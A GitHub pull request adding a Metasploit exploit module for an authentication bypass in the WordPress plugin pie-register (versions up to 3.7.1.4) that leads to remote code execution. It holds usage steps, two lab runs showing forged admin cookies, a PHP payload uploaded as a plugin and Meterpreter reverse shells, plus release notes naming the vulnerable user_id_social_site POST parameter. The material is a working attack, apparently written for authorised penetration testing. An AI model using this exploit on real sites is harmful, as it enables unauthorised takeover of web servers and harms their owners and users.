### PR TITLE
pie-register on wordpress auth-bypass to RCE

### PR DESCRIPTION
**Pull request by h00die**
This PR adds a new module which exploits pie-register for RCE.

pie-register is a wordpress plugin which contains an auth bypass via 1 POST request.  Boom, you now have an admin cookie, now follow `wp_admin_shell_upload` to get RCE via plugin.

## Verification

- [ ] install plugin
- [ ] Start `msfconsole`
- [ ] `use exploit/unix/webapp/wp_pie_register_bypass_rce`
- [ ] `set rhosts/lhosts/USERID`
- [ ] `exploit`
- [ ] **Verify** you get a shell
- [ ] **Document** looks good

### CODE REVIEW

**Comment by space-r7** [comment]
Tested against version `3.7.1.4`:

```
msf6 exploit(unix/webapp/wp_pie_register_bypass_rce) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Bypassing Authentication
[*] Found cookie: wordpress_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1635972743%7CnjRT9VwWT8sMeSvzTRX3aQcPB5d9eZYCYebi0Dmb0ez%7Cb1cc2c65c475723f721ae5db1925ab4b7475318d768100ebc665df38439beb28
[*] Found cookie: wordpress_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1635972743%7CnjRT9VwWT8sMeSvzTRX3aQcPB5d9eZYCYebi0Dmb0ez%7Cb1cc2c65c475723f721ae5db1925ab4b7475318d768100ebc665df38439beb28
[*] Found cookie: wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1635972743%7CnjRT9VwWT8sMeSvzTRX3aQcPB5d9eZYCYebi0Dmb0ez%7C77951f81119c5c3845e89569c02ee8fa0e4afb23d33eed5462e228b709499dc1
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/wLxGCLuutl/FrUDzVArDc.php...
[*] Sending stage (39282 bytes) to 192.168.140.128
[+] Deleted FrUDzVArDc.php
[+] Deleted wLxGCLuutl.php
[+] Deleted ../wLxGCLuutl
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.128:43220 ) at 2021-11-01 15:52:28 -0500

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 5.11.0-27-generic #29~20.04.1-Ubuntu SMP Wed Aug 11 15:58:17 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter >
```

File: modules/exploits/unix/webapp/wp_pie_register_bypass_rce.rb [hunk 1]
```diff
@@ -0,0 +1,125 @@
...
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress Plugin Pie Register Auth Bypass to RCE',
+        'Description' => %q{
+          This module uses an authentication bypass vulnerability in
+          Wordpress Plugin Pie Register <= 3.7.1.4 to generate a valid cookie.
+          With this cookie, hopefully of the admin, it will generate a plugin,
```
[the remark this answers is not in the document]
Comment (h00die) [reply modules/exploits/unix/webapp/wp_pie_register_bypass_rce.rb:23]: I *believe* so, not sure if any other permissions are allowed to install a plugin.

[the remark this answers is not in the document]
Comment (h00die) [reply modules/exploits/unix/webapp/wp_pie_register_bypass_rce.rb:23]: per https://www.wpbeginner.com/beginners-guide/wordpress-user-roles-and-permissions/ looks like the answer is yes, has to be admin

[the remark this answers is not in the document]
Comment (space-r7) [reply modules/exploits/unix/webapp/wp_pie_register_bypass_rce.rb:23]: Okay, thanks! I'll make a change in the docs saying that it must be an admin cookie, and then I'll get this landed.

**Comment by space-r7** [comment]
Tested against `3.7.1.3` as well:

```
msf6 exploit(unix/webapp/wp_pie_register_bypass_rce) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking /wp-content/plugins/pie-register/readme.txt
[*] Found version 3.7.1.3 in the plugin
[+] The target appears to be vulnerable.
[*] Bypassing Authentication
[*] Found cookie: wordpress_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1636033056%7C7DcLu5nHRua74tR5dC0XWa6e3tm2r6rgSyVaplLLLQ3%7C65aa9fc0fc64883fabeeeaddcb1e6b3fc8ddafeebff29d44c8aee3f9a120b0a6
[*] Found cookie: wordpress_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1636033056%7C7DcLu5nHRua74tR5dC0XWa6e3tm2r6rgSyVaplLLLQ3%7C65aa9fc0fc64883fabeeeaddcb1e6b3fc8ddafeebff29d44c8aee3f9a120b0a6
[*] Found cookie: wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1636033056%7C7DcLu5nHRua74tR5dC0XWa6e3tm2r6rgSyVaplLLLQ3%7C0b7c198f3882951405ef1cb94391eb4b716c9c2043863b670bd5681b9a11317f
[*] Preparing payload...
[*] Uploading payload...
[*] Acquired a plugin upload nonce: 6a82bb4172
[*] Uploaded plugin ZSimmytysX
[*] Executing the payload at /wp-content/plugins/ZSimmytysX/TwFGJVUffp.php...
[*] Sending stage (39282 bytes) to 192.168.140.128
[+] Deleted TwFGJVUffp.php
[+] Deleted ZSimmytysX.php
[+] Deleted ../ZSimmytysX
[*] Meterpreter session 3 opened (192.168.140.1:4444 -> 192.168.140.128:43620 ) at 2021-11-02 08:37:40 -0500

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 5.11.0-27-generic #29~20.04.1-Ubuntu SMP Wed Aug 11 15:58:17 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter >
```

**Comment by space-r7** [comment]
## Release Notes

This exploits an authentication bypass which leads to arbitrary code execution in versions  `3.7.1.4` and below of the Wordpress plugin, `pie-register`. Supplying a valid admin id to the `user_id_social_site` parameter in a POST request returns a valid session cookie. With that session cookie, a php payload as a plugin is uploaded and requested, resulting in code execution.

**Pull request merged**